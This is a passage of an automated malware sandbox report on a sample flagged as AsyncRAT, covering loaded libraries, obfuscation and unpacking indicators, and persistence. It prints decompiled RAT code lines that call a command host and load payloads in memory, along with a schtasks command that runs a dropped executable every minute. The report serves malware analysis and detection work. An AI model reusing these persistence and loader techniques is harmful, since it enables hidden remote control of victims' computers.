                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: SystemUser32.lnk.0.drLNK file: ..\..\..\..\..\SystemUser32.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: 5q4X9fRo4b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 5q4X9fRo4b.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            .NET source code contains potential unpacker
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 5q4X9fRo4b.exe, Messages.cs.Net Code: Memory
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: SystemUser32.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE00BD pushad ; iretd 0_2_00007FFAACCE00C1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7BB1 push E95D8EC9h; ret 0_2_00007FFAACCE7C79
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7C7B push E95D8EC9h; ret 0_2_00007FFAACCE7C79
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7C2D push E95D8EC9h; ret 0_2_00007FFAACCE7C79
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACBAD2A5 pushad ; iretd 8_2_00007FFAACBAD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACCC8605 push ebx; ret 8_2_00007FFAACCC86DA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACD92316 push 8B485F93h; iretd 8_2_00007FFAACD9231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACBBD2A5 pushad ; iretd 12_2_00007FFAACBBD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD0D85 pushad ; retf 12_2_00007FFAACCD0E0D
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD0D35 push eax; ret 12_2_00007FFAACCD0D43
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD00BD pushad ; iretd 12_2_00007FFAACCD00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACCD19F2 pushad ; ret 12_2_00007FFAACCD19F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACDA2316 push 8B485F92h; iretd 12_2_00007FFAACDA231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACBCD2A5 pushad ; iretd 15_2_00007FFAACBCD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACCE00BD pushad ; iretd 15_2_00007FFAACCE00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACDB2316 push 8B485F91h; iretd 15_2_00007FFAACDB231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACBBD2A5 pushad ; iretd 17_2_00007FFAACBBD2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACCD00BD pushad ; iretd 17_2_00007FFAACCD00C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAACDA2316 push 8B485F92h; iretd 17_2_00007FFAACDA231B
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 22_2_00007FFAACCD00BD pushad ; iretd 22_2_00007FFAACCD00C1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 25_2_00007FFAACCD00BD pushad ; iretd 25_2_00007FFAACCD00C1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 26_2_00007FFAACCB0033 push ds; retf 26_2_00007FFAACCB003A
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeCode function: 27_2_00007FFAACCD00BD pushad ; iretd 27_2_00007FFAACCD00C1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Roaming\SystemUser32.exeJump to dropped file

                            Boot Survival

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnkJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemUser32.lnkJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUser32Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SystemUser32Jump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
